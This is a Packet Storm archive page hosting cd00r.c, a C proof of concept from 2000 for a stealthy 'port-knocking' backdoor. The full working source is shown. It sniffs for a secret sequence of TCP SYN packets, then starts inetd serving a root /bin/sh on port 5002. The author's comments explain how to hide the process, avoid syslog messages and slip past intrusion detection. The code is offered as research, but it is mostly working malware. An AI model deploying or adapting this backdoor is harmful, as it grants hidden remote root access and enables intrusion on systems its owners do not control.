<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-type" content="text/html;charset=utf-8" />
<title>cd00r.c &#8776; Packet Storm</title>
<meta name="description" content="Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers" />
<meta name="keywords" content="security,exploit,advisory,whitepaper,xss,csrf,overflow,scanner,vulnerability" />
<link rel="shortcut icon" href="/img/pss.ico" />
<link rel="stylesheet" media="screen,print,handheld" href="https://packetstatic.com/css1651606189/pss.css" type="text/css" />
<!--[if lt ie 8]><link rel="stylesheet" type="text/css" href="https://packetstatic.com/css1651606189/ie.css" /><![endif]-->
<script type="text/javascript" src="https://packetstatic.com/js1651606189/pt.js"></script>
<script type="text/javascript" src="https://packetstatic.com/js1651606189/pss.js"></script>
<link rel="search" type="application/opensearchdescription+xml" href="https://packetstormsecurity.com/opensearch.xml" title="Packet Storm Site Search" />
<link rel="alternate" type="application/rss+xml" title="Packet Storm Headlines" href="https://rss.packetstormsecurity.com/news/" />
<link rel="alternate" type="application/rss+xml" title="Packet Storm Recent Files" href="https://rss.packetstormsecurity.com/files/" />
<link rel="alternate" type="application/rss+xml" title="Packet Storm Exploits" href="https://rss.packetstormsecurity.com/files/tags/exploit/" />
<link rel="alternate" type="application/rss+xml" title="Packet Storm Advisories" href="https://rss.packetstormsecurity.com/files/tags/advisory/" />
</head>
<body id="files">
<div id="t">
   <div id="tc">
      <a id="top" href="/"><img src="https://packetstatic.com/img1514015884/ps_logo.png" width="315" height="65" id="logo" alt="packet storm" /></a>
      <div id="slogan">what you don't know can hurt you
</div>
      <div id="account"><a href="https://packetstormsecurity.com/account/register/">Register</a> | <a href="https://packetstormsecurity.com/account/login/">Login</a></div>
      <div id="search">
        <form method="get" action="/search/"><input type="text" name="q" id="q" maxlength="120" value="Search &#8230;" /><button type="submit"></button><div id="q-tabs"><label for="s-files" class="on">Files</label><label for="s-news">News</label><label for="s-users">Users</label><label for="s-authors">Authors</label><input type="radio" value="files" name="s" id="s-files" /><input type="radio" value="news" name="s" id="s-news" /><input type="radio" value="users" name="s" id="s-users" /><input type="radio" value="authors" name="s" id="s-authors" /></div></form>
      </div>
   </div>
    <div id="tn"><div id="tnc">
        <a href="/" id="tn-home"><span>Home</span></a> <a href="/files/" id="tn-files"><span>Files</span></a> <a href="/news/" id="tn-news"><span>News</span></a> &[SERVICES_TAB]<a href="/about/" id="tn-about"><span>About</span></a> <a href="/contact/" id="tn-contact"><span>Contact</span></a> <a href="/submit/" id="tn-submit"><span>Add New</span></a>
    </div></div>
    <div id="tn2"></div>
</div>

<div id="c">

 <div id="cc">
     <div id="m">
    

    
    
    
     
    <div class="h1"><h1>cd00r.c</h1></div>
<dl id="F22121" class="file first">
<dt><a class="ico text-x-c" href="/files/download/22121/cd00r.c" title="Size: 16.2 KB"><strong>cd00r.c</strong></a></dt>
<dd class="datetime">Posted <a href="/files/date/2000-06-13/" title="21:29:23 UTC">Jun 13, 2000</a></dd>
<dd class="refer">Authored by <a href="/files/author/1396/" class="person">FX</a> | Site <a href="http://www.phenoelit.de/">phenoelit.de</a></dd>
<dd class="detail"><p>cd00r.c is a proof of concept code to test the idea of a completely invisible (read: not listening) backdoor server. Standard backdoors and remote access services have one major problem - the port&#39;s they are listening on are visible on the system console as well as from outside (by port scanning). To activate the remote access service, one has to send several packets (TCP SYN) to ports on the target system. Which ports in which order and how many of them can be defined in the source code.</p></dd>
<dd class="tags"><span>tags</span> | <a href="/files/tags/tool">tool</a>, <a href="/files/tags/remote">remote</a>, <a href="/files/tags/tcp">tcp</a>, <a href="/files/tags/rootkit">rootkit</a>, <a href="/files/tags/proof_of_concept">proof of concept</a></dd>
<dd class="os"><span>systems</span> | <a href="/files/os/unix">unix</a></dd>
<dd class="md5"><span>SHA-256</span> | <code>2f73a801f48ec39376a23f69b2bdec44c0cc0dc7e9174c8d108cec34d41d0da7</code></dd>
<dd class="act-links"><a href="/files/download/22121/cd00r.c" title="Size: 16.2 KB" rel="nofollow">Download</a>  | <a href="/files/favorite/22121/" class="fav" rel="nofollow">Favorite</a> | <a href="/files/22121/cd00r.c.html">View</span></a></dd>
</dl>
<div id="extra-links"><a href="/files/related/22121/cd00r.c.html" id="related">Related Files</a><div id="share">
<h2>Share This</h2>
<ul>
<li><iframe scrolling="no" frameborder="0" allowtransparency="true" style="border: medium none; overflow: hidden; width: 90px; height: 28px;" src="https://www.facebook.com/plugins/like.php?href=https://packetstormsecurity.com/files/22121/cd00r.c.html&amp;layout=button_count&amp;show_faces=true&amp;width=250&amp;action=like&amp;font&amp;colorscheme=light&amp;height=21"></iframe></li><li><iframe scrolling="no" frameborder="0" tabindex="0" allowtransparency="true" src="https://platform.twitter.com/widgets/tweet_button.html?_=1286138321418&amp;count=horizontal&amp;lang=en&amp;text=cd00r.c&amp;url=https://packetstormsecurity.com/files/22121/cd00r.c.html&amp;via=packet_storm" style="width: 110px; height: 21px; margin-top:5px;" title="Twitter"></iframe></li><li><a href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https://packetstormsecurity.com/files/22121/cd00r.c.html&amp;title=cd00r.c&amp;source=Packet+Storm" class="LinkedIn">LinkedIn</a></li><li><a href="https://www.reddit.com/submit?url=https://packetstormsecurity.com/files/22121/cd00r.c.html&amp;title=cd00r.c" class="Reddit">Reddit</a></li><li><a href="" class="Digg">Digg</a></li><li><a href="http://www.stumbleupon.com/submit?url=https://packetstormsecurity.com/files/22121/cd00r.c.html&amp;title=cd00r.c" class="StumbleUpon">StumbleUpon</a></li></ul>
</div>
</div>
<div class="h1"><h1>cd00r.c</h1></div>
<div class="src">
<div><a href="/mirrors/">Change Mirror</a> <a href="/files/download/22121/cd00r.c">Download</a></div>
<pre><code>/&#42; cdoor.c <br /> &#42; packet coded backdoor<br /> &#42; <br /> &#42; FX of Phenoelit &lt;fx&#64;phenoelit.de&gt;<br /> &#42; http://www.phenoelit.de/  <br /> &#42; (c) 2k <br /> &#42;<br /> &#42; &#36;Id: cd00r.c,v 1.3 2000/06/13 17:32:24 fx Exp fx &#36;<br /> &#42;<br /> &#42;<br />    &#39;cd00r.c&#39; is a proof of concept code to test the idea of a <br />    completely invisible (read: not listening) backdoor server. <br /><br />    Standard backdoors and remote access services have one major problem: <br />    The port&#39;s they are listening on are visible on the system console as <br />    well as from outside (by port scanning).<br /><br />    The approach of cd00r.c is to provide remote access to the system without <br />    showing an open port all the time. This is done by using a sniffer on the <br />    specified interface to capture all kinds of packets. The sniffer is not <br />    running in promiscuous mode to prevent a kernel message in syslog and <br />    detection by programs like AnitSniff. <br />    To activate the real remote access service (the attached code starts an <br />    inetd to listen on port 5002, which will provide a root shell), one has to <br />    send several packets (TCP SYN) to ports on the target system. Which ports <br />    in which order and how many of them can be defined in the source code.<br /><br />    When port scanning the target, no open port will show up because there is <br />    no service listening. After sending the right SYN packets to the system, <br />    cd00r starts the listener and the port(s) is/are open. One nice side effect <br />    is, that cd00r does not care whenever the port used as code is open or not. <br />    Services running on ports used as code are still fully functional, but it&#39;s <br />    not a very good idea to use these ports as explained later.<br /><br />    The best way to send the required SYN packets to the system is <br />    the use of nmap:<br />    ./nmap -sS -T Polite -p&lt;port1&gt;,&lt;port2&gt;,&lt;port3&gt;  &lt;target&gt;<br />    NOTE: the Polite timing ensures, that nmap sends the packets serial as<br />    defined.<br /><br />    Details:<br />    Prevention of local detection is done by several things:<br />    First of all, the program gives no messages et all. It accepts only one <br />    configurable command line option, which will show error messages for <br />    the sniffer functions and other initialization stuff before <br />    the first fork(). <br />    All configuration is done in the first part of the source code as #defines. <br />    This leaves the target system without configuration files and the process <br />    does not show any command line options in the process table. When renaming <br />    the binary file to something like &#39;top&#39;, it is nearly invisible.<br /><br />    The sniffer part of the code uses the LBNL libpcap and it&#39;s good filter <br />    functionality to prevent uninteresting traffic from entering the much <br />    slower test functions. By selecting higher, usually not used, ports as <br />    part of the code, the sniffer consumes nearly no processing time et all.<br /><br />    Prevention of remote detection is primary the responsibility of the <br />    &#39;user&#39;. By selecting more then 8 ports in changing order and in the <br />    higher range (&gt;20000), it is nearly impossible to brute force these <br />    without rendering the system useless. <br />    Several configurable options support the defense against remote attacks: <br />    cd00r can look at the source address and (if defined) resets the code if <br />    a packet from another location arrives. By not using this function, one <br />    can activate the remote shell by sending the right packets from several <br />    systems, hereby flying below the IDS radar. <br />    Another feature is to reset or not reset the list of remaining ports <br />    (code list), if a false packet arrives. On heavy loaded systems this <br />    can happen often and would prevent the authorized sender to activate <br />    the remote shell. Again, when flying below the IDS radar, such <br />    functionality can be counterproductive because the usual way to <br />    prevent detection by an IDS is to send packets with long delays. <br /><br />    What action cd00r actually takes is open to the user. The function <br />    cdr_open_door() is called without any argument. It fork()s twice <br />    to prevent zombies. Just add your code after the fork()s.<br /><br />    The functionality outlined in these lines of terrific C source can <br />    be used for booth sides of the security game. If you have a system <br />    somewhere in the wild and you don&#39;t like to show open ports (except <br />    the usual httpd ;-) to the world, you may consider some modifications, <br />    so cd00r will provide you with a running ssh. <br />    On the other hand, one may like to create a backchanel, therefor never<br />    providing any kind of listening port on the system.<br /><br />    Even the use of TCP SYN packets is just an example. Using the sniffer,<br />    one can easily change the opening conditions to something like two SYN, one <br />    ICMP echo request and five UDP packets. I personally like the TCP/SYN stuff<br />    because it has many possible permutations without changing the code.<br /><br /> Compile it as:<br /><br /> gcc -o &lt;whatever&gt; -I/where/ever/bpf -L/where/ever/bpf cd00r.c -lpcap<br /><br /> of for some debug output:<br /><br /> gcc -DDEBUG -o &lt;whatever&gt; -I/where/ever/bpf -L/where/ever/bpf cd00r.c -lpcap<br /><br /> &#42;/<br /><br /><br />/&#42; cd00r doesn&#39;t use command line arguments or a config file, because this <br /> &#42; would provide a pattern to look for on the target systems<br /> &#42;<br /> &#42; instead, we use #defines to specifiy variable parameters such as interface <br /> &#42; to listen on and perhaps the code ports<br /> &#42;/<br /><br />/&#42; the interface tp &quot;listen&quot; on &#42;/<br />#define CDR_INTERFACE    &quot;eth0&quot;<br />/&#42; the address to listen on. Comment out if not desired <br /> &#42; NOTE: if you don&#39;t use CDR_ADDRESS, traffic FROM the target host, which <br /> &#42;       matches the port code also opens the door&#42;/<br />/&#42; #define CDR_ADDRESS    &quot;192.168.1.1&quot;  &#42;/<br /><br />/&#42; the code ports.<br /> &#42; These are the &#39;code ports&#39;, which open (when called in the right order) the <br /> &#42; door (read: call the cdr_open_door() function).<br /> &#42; Use the notation below (array) to specify code ports. Terminate the list<br /> &#42; with 0 - otherwise, you really have problems.<br /> &#42;/<br />#define CDR_PORTS    &#123; 200,80,22,53,3,00 &#125;<br /><br />/&#42; This defines that a SYN packet to our address and not to the right port <br /> &#42; causes the code to reset. On systems with permanent access to the internet<br /> &#42; this would cause cd00r to never open, especially if they run some kind of <br /> &#42; server. Additional, if you would like to prevent an IDS from detecting your<br /> &#42; &#39;unlock&#39; packets as SYN-Scan, you have to delay them. <br /> &#42; On the other hand, not resetting the code means that<br /> &#42; with a short/bad code the chances are good that cd00r unlocks for some <br /> &#42; random traffic or after heavy portscans. If you use CDR_SENDER_ADDR these<br /> &#42; chances are less.<br /> &#42; <br /> &#42; To use resets, define CDR_CODERESET <br /> &#42;/<br />#define CDR_CODERESET<br /><br />/&#42; If you like to open the door from different addresses (e.g. to<br /> &#42; confuse an IDS), don&#39;t define this.<br /> &#42; If defined, all SYN packets have to come from the same address. Use<br /> &#42; this when not defining CDR_CODERESET.<br /> &#42;/<br />#define CDR_SENDER_ADDR<br /><br />/&#42; this defines the one and only command line parameter. If given, cd00r<br /> &#42; reports errors befor the first fork() to stderr.<br /> &#42; Hint: don&#39;t use more then 3 characters to pervent strings(1) fishing<br /> &#42;/<br />#define CDR_NOISE_COMMAND  &quot;noi&quot;<br /><br /><br />/&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;<br /> &#42; Nothing to change below this line (hopefully)<br /> &#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;/<br />#include &lt;stdio.h&gt;<br />#include &lt;stdlib.h&gt;<br />#include &lt;string.h&gt;<br />#include &lt;unistd.h&gt;<br />#include &lt;signal.h&gt;<br />#include &lt;netinet/in.h&gt;                 /&#42; for IPPROTO_bla consts &#42;/<br />#include &lt;sys/socket.h&gt;                 /&#42; for inet_ntoa() &#42;/<br />#include &lt;arpa/inet.h&gt;                  /&#42; for inet_ntoa() &#42;/<br />#include &lt;netdb.h&gt;      /&#42; for gethostbyname() &#42;/<br />#include &lt;sys/types.h&gt;      /&#42; for wait() &#42;/<br />#include &lt;sys/wait.h&gt;      /&#42; for wait() &#42;/<br /><br />#include &lt;pcap.h&gt;<br />#include &lt;net/bpf.h&gt;<br /><br />#define ETHLENGTH   14<br />#define IP_MIN_LENGTH   20<br />#define CAPLENGTH  98<br /><br /><br /><br />struct iphdr &#123;<br />        u_char  ihl:4,        /&#42; header length &#42;/<br />        version:4;              /&#42; version &#42;/<br />        u_char  tos;          /&#42; type of service &#42;/<br />        short   tot_len;      /&#42; total length &#42;/<br />        u_short id;           /&#42; identification &#42;/<br />        short   off;          /&#42; fragment offset field &#42;/<br />        u_char  ttl;          /&#42; time to live &#42;/<br />        u_char  protocol;     /&#42; protocol &#42;/<br />        u_short check;        /&#42; checksum &#42;/<br />        struct  in_addr saddr;<br />  struct  in_addr daddr;  /&#42; source and dest address &#42;/<br />&#125;;<br /><br />struct tcphdr &#123;<br />        unsigned short int   src_port;<br />  unsigned short int   dest_port;<br />        unsigned long int   seq_num;<br />        unsigned long int   ack_num;<br />  unsigned short int  rawflags;<br />        unsigned short int   window;<br />        long int     crc_a_urgent;<br />        long int     options_a_padding;<br />&#125;;<br /><br />/&#42; the ports which have to be called (by a TCP SYN packet), before<br /> &#42; cd00r opens <br /> &#42;/<br />unsigned int   cports&#91;&#93; &#61; CDR_PORTS;<br />int    cportcnt &#61; 0;<br />/&#42; which is the next required port ? &#42;/<br />int    actport &#61; 0;<br /><br />#ifdef CDR_SENDER_ADDR<br />/&#42; some times, looking at sender&#39;s address is desired.<br /> &#42; If so, sender&#39;s address is saved here &#42;/<br />struct in_addr  sender;<br />#endif CDR_SENDER_ADDR<br /><br />/&#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;<br /> &#42; cdr_open_door() is called, when all port codes match<br /> &#42; This function can be changed to whatever you like to do when the system<br /> &#42; accepts the code <br /> &#42;&#42;&#42;&#42;&#42;&#42;&#42;&#42;/<br />void cdr_open_door(void) &#123;<br />    FILE  &#42;f;<br /><br />    char  &#42;args&#91;&#93; &#61; &#123;&quot;/usr/sbin/inetd&quot;,&quot;/tmp/.ind&quot;,NULL&#125;;<br /><br />    switch (fork()) &#123;<br />  case -1: <br />#ifdef DEBUG<br />      printf(&quot;fork() failed ! Fuck !\n&quot;);<br />#endif DEBUG<br />      return;<br />  case 0: <br />      /&#42; To prevent zombies (inetd-zombies look quite stupid) we do<br />       &#42; a second fork() &#42;/<br />      switch (fork()) &#123;<br />    case -1: _exit(0);<br />    case 0: /&#42;that&#39;s fine &#42;/<br />       break;<br />    default: _exit(0);<br />      &#125;<br />       break;<br /><br />  default: <br />       wait(NULL);<br />       return;<br />    &#125;<br /><br />    if ((f&#61;fopen(&quot;/tmp/.ind&quot;,&quot;a+t&quot;))&#61;&#61;NULL) return;<br />    fprintf(f,&quot;5002  stream  tcp     nowait  root    /bin/sh  sh\n&quot;);<br />    fclose(f);<br /><br />    execv(&quot;/usr/sbin/inetd&quot;,args);<br />#ifdef DEBUG<br />    printf(&quot;Strange return from execvp() !\n&quot;);<br />#endif DEBUG<br />    exit (0);<br /><br />&#125;<br /><br /><br />/&#42; error function for pcap lib &#42;/<br />void capterror(pcap_t &#42;caps, char &#42;message) &#123;<br />    pcap_perror(caps,message);<br />    exit (-1);<br />&#125;<br /><br />/&#42; signal counter/handler &#42;/<br />void signal_handler(int sig) &#123;<br />    /&#42; the ugly way ... &#42;/<br />    _exit(0);<br />&#125;<br /><br />void &#42;smalloc(size_t size) &#123;<br />    void  &#42;p;<br /><br />    if ((p&#61;malloc(size))&#61;&#61;NULL) &#123;<br />  exit(-1);<br />    &#125;<br />    memset(p,0,size);<br />    return p;<br />&#125;<br /><br /><br />/&#42; general rules in main():<br /> &#42;   - errors force an exit without comment to keep the silence<br /> &#42;   - errors in the initialization phase can be displayed by a <br /> &#42;     command line option <br /> &#42;/<br />int main (int argc, char &#42;&#42;argv) &#123;<br /><br />    /&#42; variables for the pcap functions &#42;/<br />#define  CDR_BPF_PORT   &quot;port &quot;<br />#define CDR_BPF_ORCON  &quot; or &quot;<br />    char     pcap_err&#91;PCAP_ERRBUF_SIZE&#93;; /&#42; buffer for pcap errors &#42;/<br />    pcap_t     &#42;cap;                       /&#42; capture handler &#42;/<br />    bpf_u_int32   network,netmask;<br />    struct pcap_pkthdr   &#42;phead;<br />    struct bpf_program   cfilter;             /&#42; the compiled filter &#42;/<br />    struct iphdr   &#42;ip;<br />    struct tcphdr   &#42;tcp;<br />    u_char    &#42;pdata;<br />    /&#42; for filter compilation &#42;/<br />    char    &#42;filter;<br />    char    portnum&#91;6&#93;;<br />    /&#42; command line &#42;/<br />    int      cdr_noise &#61; 0;<br />    /&#42; the usual int i &#42;/<br />    int      i;<br />    /&#42; for resolving the CDR_ADDRESS &#42;/<br />#ifdef CDR_ADDRESS<br />    struct hostent  &#42;hent;<br />#endif CDR_ADDRESS<br /><br /><br /><br />    /&#42; check for the one and only command line argument &#42;/<br />    if (argc&gt;1) &#123;<br />  if (!strcmp(argv&#91;1&#93;,CDR_NOISE_COMMAND)) <br />      cdr_noise++;<br />  else <br />      exit (0);<br />    &#125; <br /><br />    /&#42; resolve our address - if desired &#42;/<br />#ifdef CDR_ADDRESS<br />    if ((hent&#61;gethostbyname(CDR_ADDRESS))&#61;&#61;NULL) &#123;<br />  if (cdr_noise) <br />      fprintf(stderr,&quot;gethostbyname() failed\n&quot;);<br />  exit (0);<br />    &#125;<br />#endif CDR_ADDRESS<br /><br />    /&#42; count the ports our user has #defined &#42;/<br />    while (cports&#91;cportcnt++&#93;);<br />    cportcnt--;<br />#ifdef DEBUG<br />    printf(&quot;%d ports used as code\n&quot;,cportcnt);<br />#endif DEBUG<br /><br />    /&#42; to speed up the capture, we create an filter string to compile. <br />     &#42; For this, we check if the first port is defined and create it&#39;s filter,<br />     &#42; then we add the others &#42;/<br />    <br />    if (cports&#91;0&#93;) &#123;<br />  memset(&amp;portnum,0,6);<br />  sprintf(portnum,&quot;%d&quot;,cports&#91;0&#93;);<br />  filter&#61;(char &#42;)smalloc(strlen(CDR_BPF_PORT)+strlen(portnum)+1);<br />  strcpy(filter,CDR_BPF_PORT);<br />  strcat(filter,portnum);<br />    &#125; else &#123;<br />  if (cdr_noise) <br />      fprintf(stderr,&quot;NO port code\n&quot;);<br />  exit (0);<br />    &#125; <br /><br />    /&#42; here, all other ports will be added to the filter string which reads<br />     &#42; like this:<br />     &#42; port &lt;1&gt; or port &lt;2&gt; or port &lt;3&gt; ...<br />     &#42; see tcpdump(1)<br />     &#42;/<br />    <br />    for (i&#61;1;i&lt;cportcnt;i++) &#123;<br />  if (cports&#91;i&#93;) &#123;<br />      memset(&amp;portnum,0,6);<br />      sprintf(portnum,&quot;%d&quot;,cports&#91;i&#93;);<br />      if ((filter&#61;(char &#42;)realloc(filter,<br />          strlen(filter)+<br />          strlen(CDR_BPF_PORT)+<br />          strlen(portnum)+<br />          strlen(CDR_BPF_ORCON)+1))<br />        &#61;&#61;NULL) &#123;<br />    if (cdr_noise)<br />        fprintf(stderr,&quot;realloc() failed\n&quot;);<br />    exit (0);<br />      &#125;<br />      strcat(filter,CDR_BPF_ORCON);<br />      strcat(filter,CDR_BPF_PORT);<br />      strcat(filter,portnum);<br />  &#125;<br />    &#125; <br /><br />#ifdef DEBUG<br />    printf(&quot;DEBUG: &#39;%s&#39;\n&quot;,filter);<br />#endif DEBUG<br /><br />    /&#42; initialize the pcap &#39;listener&#39; &#42;/<br />    if (pcap_lookupnet(CDR_INTERFACE,&amp;network,&amp;netmask,pcap_err)!&#61;0) &#123;<br />  if (cdr_noise)<br />      fprintf(stderr,&quot;pcap_lookupnet: %s\n&quot;,pcap_err);<br />  exit (0);<br />    &#125;<br /><br />    /&#42; open the &#39;listener&#39; &#42;/<br />    if ((cap&#61;pcap_open_live(CDR_INTERFACE,CAPLENGTH,<br />        0,  /&#42;not in promiscuous mode&#42;/<br />        0,  /&#42;no timeout &#42;/<br />        pcap_err))&#61;&#61;NULL) &#123;<br />  if (cdr_noise)<br />      fprintf(stderr,&quot;pcap_open_live: %s\n&quot;,pcap_err);<br />  exit (0);<br />    &#125;<br /><br />    /&#42; now, compile the filter and assign it to our capture &#42;/<br />    if (pcap_compile(cap,&amp;cfilter,filter,0,netmask)!&#61;0) &#123;<br />  if (cdr_noise) <br />      capterror(cap,&quot;pcap_compile&quot;);<br />  exit (0);<br />    &#125;<br />    if (pcap_setfilter(cap,&amp;cfilter)!&#61;0) &#123;<br />  if (cdr_noise)<br />      capterror(cap,&quot;pcap_setfilter&quot;);<br />  exit (0);<br />    &#125;<br /><br />    /&#42; the filter is set - let&#39;s free the base string&#42;/<br />    free(filter);<br />    /&#42; allocate a packet header structure &#42;/<br />    phead&#61;(struct pcap_pkthdr &#42;)smalloc(sizeof(struct pcap_pkthdr));<br /><br />    /&#42; register signal handler &#42;/<br />    signal(SIGABRT,&amp;signal_handler);<br />    signal(SIGTERM,&amp;signal_handler);<br />    signal(SIGINT,&amp;signal_handler);<br /><br />    /&#42; if we don&#39;t use DEBUG, let&#39;s be nice and close the streams &#42;/<br />#ifndef DEBUG<br />    fclose(stdin);<br />    fclose(stdout);<br />    fclose(stderr);<br />#endif DEBUG<br /><br />    /&#42; go daemon &#42;/<br />    switch (i&#61;fork()) &#123;<br />  case -1:<br />      if (cdr_noise)<br />    fprintf(stderr,&quot;fork() failed\n&quot;);<br />      exit (0);<br />      break;  /&#42; not reached &#42;/<br />  case 0:<br />      /&#42; I&#39;m happy &#42;/<br />      break;<br />  default:<br />      exit (0);<br />    &#125;<br /><br />    /&#42; main loop &#42;/<br />    for(;;) &#123;<br />  /&#42; if there is no &#39;next&#39; packet in time, continue loop &#42;/<br />  if ((pdata&#61;(u_char &#42;)pcap_next(cap,phead))&#61;&#61;NULL) continue;<br />  /&#42; if the packet is to small, continue loop &#42;/<br />  if (phead-&gt;len&lt;&#61;(ETHLENGTH+IP_MIN_LENGTH)) continue; <br />  <br />  /&#42; make it an ip packet &#42;/<br />  ip&#61;(struct iphdr &#42;)(pdata+ETHLENGTH);<br />  /&#42; if the packet is not IPv4, continue &#42;/<br />  if ((unsigned char)ip-&gt;version!&#61;4) continue;<br />  /&#42; make it TCP &#42;/<br />  tcp&#61;(struct tcphdr &#42;)(pdata+ETHLENGTH+((unsigned char)ip-&gt;ihl&#42;4));<br /><br />  /&#42; FLAG check&#39;s - see rfc793 &#42;/<br />  /&#42; if it isn&#39;t a SYN packet, continue &#42;/<br />  if (!(ntohs(tcp-&gt;rawflags)&amp;0x02)) continue;<br />  /&#42; if it is a SYN-ACK packet, continue &#42;/<br />  if (ntohs(tcp-&gt;rawflags)&amp;0x10) continue;<br /><br />#ifdef CDR_ADDRESS<br />  /&#42; if the address is not the one defined above, let it be &#42;/<br />  if (hent) &#123;<br />#ifdef DEBUG<br />      if (memcmp(&amp;ip-&gt;daddr,hent-&gt;h_addr_list&#91;0&#93;,hent-&gt;h_length)) &#123;<br />    printf(&quot;Destination address mismatch\n&quot;);<br />    continue;<br />      &#125;<br />#else <br />      if (memcmp(&amp;ip-&gt;daddr,hent-&gt;h_addr_list&#91;0&#93;,hent-&gt;h_length)) <br />    continue;<br />#endif DEBUG<br />  &#125;<br />#endif CDR_ADDRESS<br /><br />  /&#42; it is one of our ports, it is the correct destination <br />   &#42; and it is a genuine SYN packet - let&#39;s see if it is the RIGHT<br />   &#42; port &#42;/<br />  if (ntohs(tcp-&gt;dest_port)&#61;&#61;cports&#91;actport&#93;) &#123;<br />#ifdef DEBUG<br />      printf(&quot;Port %d is good as code part %d\n&quot;,ntohs(tcp-&gt;dest_port),<br />        actport);<br />#endif DEBUG<br />#ifdef CDR_SENDER_ADDR<br />      /&#42; check if the sender is the same &#42;/<br />      if (actport&#61;&#61;0) &#123;<br />    memcpy(&amp;sender,&amp;ip-&gt;saddr,4);<br />      &#125; else &#123;<br />    if (memcmp(&amp;ip-&gt;saddr,&amp;sender,4)) &#123; /&#42; sender is different &#42;/<br />        actport&#61;0;<br />#ifdef DEBUG<br />        printf(&quot;Sender mismatch\n&quot;);<br />#endif DEBUG<br />        continue;<br />    &#125;<br />      &#125;<br />#endif CDR_SENDER_ADDR<br />      /&#42; it is the rigth port ... take the next one<br />       &#42; or was it the last ??&#42;/<br />      if ((++actport)&#61;&#61;cportcnt) &#123;<br />    /&#42; BINGO &#42;/<br />    cdr_open_door();<br />    actport&#61;0;<br />      &#125; /&#42; ups... some more to go &#42;/<br />  &#125; else &#123;<br />#ifdef CDR_CODERESET<br />      actport&#61;0;<br />#endif CDR_CODERESET<br />      continue;<br />  &#125;<br />    &#125; /&#42; end of main loop &#42;/<br /><br />    /&#42; this is actually never reached, because the signal_handler() does the <br />     &#42; exit.<br />     &#42;/<br />    return 0;<br />&#125;<br /></code></pre>
</div>
 <div id="comment-form" style="display:none"></div><div id="comment-login"><a href="https://packetstormsecurity.com/account/login/">Login</a> or <a href="https://packetstormsecurity.com/account/register/">Register</a> to add favorites</div>
    
    
     </div>
    
      <div id="adblock">
        
      </div>
      <div id="mn">
        <div class="mn-like-us">
<ul>
<li><a href="https://twitter.com/packet_storm"><img src="https://packetstatic.com/img1514015884/s_twitter.png" width="24" height="24" alt="Follow on Twitter" /> Follow us on Twitter</a></li>
<li><a href="https://www.facebook.com/packetstormfeed"><img src="https://packetstatic.com/img1514015884/s_facebook.png" width="24" height="24" alt="Follow on Facebook" /> Follow us on Facebook</a></li>
<li><a href="/feeds"><img src="https://packetstatic.com/img1514015884/s_rss.png" width="24" height="24" alt="View RSS Feeds" /> Subscribe to an RSS Feed</a></li>
</ul>
</div>

<div>
<form id="cal" action="/files/cal/" method="get">
<h2>File Archive:</h2><h3>March 2023</h3>
<button id="cal-prev" name="cal-prev" type="button" value="2023-3"><span>&lt;</span></button><ul class="dotw"><li>Su</li><li>Mo</li><li>Tu</li><li>We</li><li>Th</li><li>Fr</li><li>Sa</li></ul>
<ul><li></li><li></li><li></li><li class="med"><a href="/files/date/2023-03-01/">1</a><div class="stats"><div class="point"></div><div class="date">Mar 1st</div><div class="count">16 Files</div></div></li><li class="low"><a href="/files/date/2023-03-02/">2</a><div class="stats"><div class="point"></div><div class="date">Mar 2nd</div><div class="count">13 Files</div></div></li><li class="med"><a href="/files/date/2023-03-03/">3</a><div class="stats"><div class="point"></div><div class="date">Mar 3rd</div><div class="count">15 Files</div></div></li><li class="none"><a href="/files/date/2023-03-04/">4</a><div class="stats"><div class="point"></div><div class="date">Mar 4th</div><div class="count">0 Files</div></div></li></ul>
<ul><li class="none"><a href="/files/date/2023-03-05/">5</a><div class="stats"><div class="point"></div><div class="date">Mar 5th</div><div class="count">0 Files</div></div></li><li class="med"><a href="/files/date/2023-03-06/">6</a><div class="stats"><div class="point"></div><div class="date">Mar 6th</div><div class="count">16 Files</div></div></li><li class="med"><a href="/files/date/2023-03-07/">7</a><div class="stats"><div class="point"></div><div class="date">Mar 7th</div><div class="count">31 Files</div></div></li><li class="med"><a href="/files/date/2023-03-08/">8</a><div class="stats"><div class="point"></div><div class="date">Mar 8th</div><div class="count">16 Files</div></div></li><li class="low"><a href="/files/date/2023-03-09/">9</a><div class="stats"><div class="point"></div><div class="date">Mar 9th</div><div class="count">13 Files</div></div></li><li class="low"><a href="/files/date/2023-03-10/">10</a><div class="stats"><div class="point"></div><div class="date">Mar 10th</div><div class="count">9 Files</div></div></li><li class="none"><a href="/files/date/2023-03-11/">11</a><div class="stats"><div class="point"></div><div class="date">Mar 11th</div><div class="count">0 Files</div></div></li></ul>
